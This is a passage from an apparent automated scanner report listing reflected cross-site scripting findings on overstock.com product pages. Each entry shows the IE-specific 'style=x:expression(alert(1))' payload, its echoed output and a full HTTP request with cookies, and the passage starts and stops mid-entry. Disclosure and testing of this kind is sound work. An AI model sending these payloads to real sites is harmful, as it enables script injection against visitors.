GET /Home-Garden/Cotton-All-Seasons-250-Thread-Count-White-Down-Comforter/4104109/product.html?793c6"style%3d"x%3aexpression(alert(1))"6fda90dd35b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.182. http://www.overstock.com/Home-Garden/Cotton-Reversible-Bathroom-Rug-26-x-42/3465539/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7eba5"style%3d"x%3aexpression(alert(1))"7e8d224c0da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7eba5"style="x:expression(alert(1))"7e8d224c0da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Cotton-Reversible-Bathroom-Rug-26-x-42/3465539/product.html?7eba5"style%3d"x%3aexpression(alert(1))"7e8d224c0da=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.183. http://www.overstock.com/Home-Garden/Coventry-Large-Antique-Black-Media-Stand/2545487/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d23c"style%3d"x%3aexpression(alert(1))"e4b7e894d70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d23c"style="x:expression(alert(1))"e4b7e894d70 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Coventry-Large-Antique-Black-Media-Stand/2545487/product.html?5d23c"style%3d"x%3aexpression(alert(1))"e4b7e894d70=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.184. http://www.overstock.com/Home-Garden/Cow-Girl-Pink-5-piece-Bed-in-a-Bag-with-Sheet-Set/3199856/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45782"style%3d"x%3aexpression(alert(1))"7014605ed4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45782"style="x:expression(alert(1))"7014605ed4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Cow-Girl-Pink-5-piece-Bed-in-a-Bag-with-Sheet-Set/3199856/product.html?45782"style%3d"x%3aexpression(alert(1))"7014605ed4=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.185. http://www.overstock.com/Home-Garden/Cuisinart-DCC-1200BCHFR-12-cup-Brew-Central-Coffeemaker-Refurbished/5043245/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d68b"style%3d"x%3aexpression(alert(1))"3bc0b78e6ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d68b"style="x:expression(alert(1))"3bc0b78e6ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Cuisinart-DCC-1200BCHFR-12-cup-Brew-Central-Coffeemaker-Refurbished/5043245/product.html?8d68b"style%3d"x%3aexpression(alert(1))"3bc0b78e6ef=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.186. http://www.overstock.com/Home-Garden/Curved-Shower-Rod-w-Shower-Liner-and-Hooks-Set/4577462/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4963f"style%3d"x%3aexpression(alert(1))"17865a89808 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4963f"style="x:expression(alert(1))"17865a89808 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Curved-Shower-Rod-w-Shower-Liner-and-Hooks-Set/4577462/product.html?4963f"style%3d"x%3aexpression(alert(1))"17865a89808=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.187. http://www.overstock.com/Home-Garden/Damask-600-Thread-Count-Duvet-Cover-Set/886885/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90e4f"style%3d"x%3aexpression(alert(1))"dc7938bf780 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 90e4f"style="x:expression(alert(1))"dc7938bf780 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Damask-600-Thread-Count-Duvet-Cover-Set/886885/product.html?90e4f"style%3d"x%3aexpression(alert(1))"dc7938bf780=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.188. http://www.overstock.com/Home-Garden/Decor-Swirl-Print-Dining-Chairs-Set-of-2/4401057/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12426"style%3d"x%3aexpression(alert(1))"7db3f2a2acc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12426"style="x:expression(alert(1))"7db3f2a2acc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Decor-Swirl-Print-Dining-Chairs-Set-of-2/4401057/product.html?12426"style%3d"x%3aexpression(alert(1))"7db3f2a2acc=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.189. http://www.overstock.com/Home-Garden/Decorator-28x28-inch-Euro-Pillow-Set-Set-of-2/4493223/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e7fb"style%3d"x%3aexpression(alert(1))"0e72de1fc7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e7fb"style="x:expression(alert(1))"0e72de1fc7a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Decorator-28x28-inch-Euro-Pillow-Set-Set-of-2/4493223/product.html?6e7fb"style%3d"x%3aexpression(alert(1))"0e72de1fc7a=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.190. http://www.overstock.com/Home-Garden/Deluxe-Memory-Foam-Cube-Ottoman/2519117/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75fcf"style%3d"x%3aexpression(alert(1))"be671237462 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75fcf"style="x:expression(alert(1))"be671237462 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Deluxe-Memory-Foam-Cube-Ottoman/2519117/product.html?75fcf"style%3d"x%3aexpression(alert(1))"be671237462=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.191. http://www.overstock.com/Home-Garden/Deluxe-Tempered-Glass-L-shaped-Computer-Desk/2605151/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 485cd"style%3d"x%3aexpression(alert(1))"e3e8c11dec3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 485cd"style="x:expression(alert(1))"e3e8c11dec3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Deluxe-Tempered-Glass-L-shaped-Computer-Desk/2605151/product.html?485cd"style%3d"x%3aexpression(alert(1))"e3e8c11dec3=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.192. http://www.overstock.com/Home-Garden/DuroMax-Elite-MX4500-Generator/4352971/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b5bb"style%3d"x%3aexpression(alert(1))"66a50b408ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6b5bb"style="x:expression(alert(1))"66a50b408ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/DuroMax-Elite-MX4500-Generator/4352971/product.html?6b5bb"style%3d"x%3aexpression(alert(1))"66a50b408ac=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.193. http://www.overstock.com/Home-Garden/Dyson-DC14-All-Floors-Upright-Vacuum-Refurbished/1777830/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67408"style%3d"x%3aexpression(alert(1))"9b4a58d7fd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 67408"style="x:expression(alert(1))"9b4a58d7fd4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Dyson-DC14-All-Floors-Upright-Vacuum-Refurbished/1777830/product.html?67408"style%3d"x%3aexpression(alert(1))"9b4a58d7fd4=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.194. http://www.overstock.com/Home-Garden/Dyson-DC14-Animal-Upright-Vacuum-Refurbished/1544111/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94ff7"style%3d"x%3aexpression(alert(1))"ca03492387b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 94ff7"style="x:expression(alert(1))"ca03492387b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Dyson-DC14-Animal-Upright-Vacuum-Refurbished/1544111/product.html?94ff7"style%3d"x%3aexpression(alert(1))"ca03492387b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.195. http://www.overstock.com/Home-Garden/Dyson-DC17-Animal-Upright-Vacuum-Refurbished/3037773/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e838"style%3d"x%3aexpression(alert(1))"1b4ef56732d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3e838"style="x:expression(alert(1))"1b4ef56732d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
